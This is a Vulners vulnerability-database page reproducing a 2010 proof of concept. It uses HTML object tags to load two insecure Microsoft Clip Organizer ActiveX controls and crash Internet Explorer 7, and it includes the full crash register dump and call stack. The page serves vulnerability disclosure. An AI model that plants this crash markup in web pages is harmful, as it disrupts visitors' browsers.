Vulners
Lucene search
Internet Explorer 7.0 Denial Of Service
`# IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control
#
# Date: 19th july 2010
#
# Author: Dinesh Arora & Beenu Arora
#
#
# Affected / Tested Version of IE : 7.0 / WinXP SP3 / MS Office 2007
#
# contact: [email protected], [email protected]
#
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly
#
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
POC:
<!--
COM Object - {0009608B-3E4E-4BF4-8C8C-D107F1F7B4CE} MC Euro Lexical Analyzer
*******************************************************************************
COM Object Filename : C:\PROGRA~1\MICROS~2\Office12\MCPS.DLL
Major Version : 12
Minor Version : 0
Build Number : 4518
Revision Number : 1014
Product Version : 12.0.4518.1014
Product Name : Microsoft Clip Organizer
-->
<object id=TestObj classid="CLSID:{0009608B-3E4E-4BF4-8C8C-D107F1F7B4CE}" style="width:100;height:350"></object>
<!--
COM Object - {0051FAAD-74C8-4057-8A85-1CFBF9ABB05C} MC Shared Search Scope
*******************************************************************************
COM Object Filename : C:\PROGRA~1\MICROS~2\Office12\MCPS.DLL
Major Version : 12
Minor Version : 0
Build Number : 4518
Revision Number : 1014
Product Version : 12.0.4518.1014
Product Name : Microsoft Clip Organizer
*******************************************************************************
-->
<object id=TestObj classid="CLSID:{0051FAAD-74C8-4057-8A85-1CFBF9ABB05C}" style="width:100;height:350"></object>
Register:
EAX 02299BC4
ECX 00000000
EDX 00000000
EBX 00000000
ESP 02299BC0
EBP 02299C14
ESI 02299C8C
EDI 00000000
EIP 7C812AFB kernel32.7C812AFB
kernel32!RaiseException+53 in C:\WINDOWS\system32\kernel32.dll from Microsoft Corporation has caused an unknown exception (0xc06d007e) on thread 33
This exception originated from MCPS!DllGetClassObject+6db1.
Function Arg 1 Arg 2 Arg 3 Source
kernel32!RaiseException+53 c06d007e 00000000 00000001
MCPS!DllGetClassObject+6db1 00000000 06029c38 39f34f4c
MCPS!DllGetClassObject+5c6d 39f2a3bc 39f221b4 39f34360
MCPS!DllCanUnloadNow+2b6b 00205cf0 0602a688 06029d64
ole32!CClassCache::CDllPathEntry::DllGetClassObject+2d 00205cf0 0602a688 06029d64
ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+1f 06029d18 0602a688 06029d64
ole32!CClassCache::GetClassObject+38 06029d6c 0602a83c 0602a300
ole32!CServerContextActivator::GetClassObject+f5 77607150 0602a300 0602a83c
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3 0602a300 0602a83c 0602a300
ole32!CApartmentActivator::GetClassObject+4d 77607154 0602a300 0602a83c
ole32!CProcessActivator::GCOCallback+2b 77607154 00000001 00000000
ole32!CProcessActivator::AttemptActivation+2c 7760714c 0602a15c 00000000
ole32!CProcessActivator::ActivateByContext+42 7760714c 0602a15c 00000000
ole32!CProcessActivator::GetClassObject+48 7760714c 0602a300 0602a83c
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3 0602a300 0602a83c 003a0043
ole32!CClientContextActivator::GetClassObject+88 77607114 00000001 0602a83c
ole32!ActivationPropertiesIn::DelegateGetClassObject+f3 0602a300 0602a83c 774eca20
ole32!ICoGetClassObject+334 0602a9dc 00000007 00000000
ole32!CComActivator::DoGetClassObject+93 0602a9dc 00000007 00000000
ole32!CoGetClassObject+1b 0602a9dc 00000007 00000000
urlmon!CoGetClassObjectWrap+33 0602a9dc 00000007 00000000
urlmon!CoGetClassObjectFromURL+2ae 056f8fd0 00000000 00000000
mshtml!CCodeLoad::BindToObject+464 3cf5193c 0602bc00 00000000
mshtml!CCodeLoad::Init+296 0576d538 0602bc00 3cf8d43c
mshtml!COleSite::CreateObject+5a5 0602bc00 05720bf8 05976520
mshtml!CObjectElement::CreateObject+6af 3cee8243 0573a860 00000000
mshtml!CHtmObjectParseCtx::Execute+8 0573a860 00000000 00000000
mshtml!CHtmParse::Execute+43 05720bf8 00000000 0573a860
mshtml!CHtmPost::Broadcast+11 3cedb43d 0577ca50 0573a860
mshtml!CHtmPost::Exec+40a 24a63821 0577ca50 0573a860
mshtml!CHtmPost::Run+13 24a63821 0577ca50 0573a860
mshtml!PostManExecute+dc 0577ca50 24a63821 0573a860
mshtml!PostManResume+9e 0573a860 00000001 0602fdf4
mshtml!CHtmPost::OnDwnChanCallback+10 05952930 0573a860 0602fe28
mshtml!CDwnChan::OnMethodCall+19 05952930 00000000 00000000
mshtml!GlobalWndOnMethodCall+101 0602feb0 3cf513d9 00000000
mshtml!GlobalWndProc+181 005707a2 00000009 00000000
user32!InternalCallWinProc+28 3cf513d9 005707a2 00008002
user32!UserCallWinProcCheckWow+150 00000000 3cf513d9 005707a2
user32!DispatchMessageWorker+306 0602ff64 00000000 0602ffb4
user32!DispatchMessageW+f 0602ff64 053400b8 000001c1
ieframe!CTabWindow::_TabWindowThreadProc+189 056adac8 053400b8 000001c1
kernel32!BaseThreadStart+37 3e25e4fc 056a5cf8 00000000
The assembly instruction at kernel32!RaiseException+53 in C:\WINDOWS\system32\kernel32.dll from Microsoft Corporation has caused an unknown exception (0xc06d007e) on thread 33
This exception originated from MCPS!DllGetClassObject+6db1.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jul 2010 00:00Current
0.1Low risk
Vulners AI Score0.1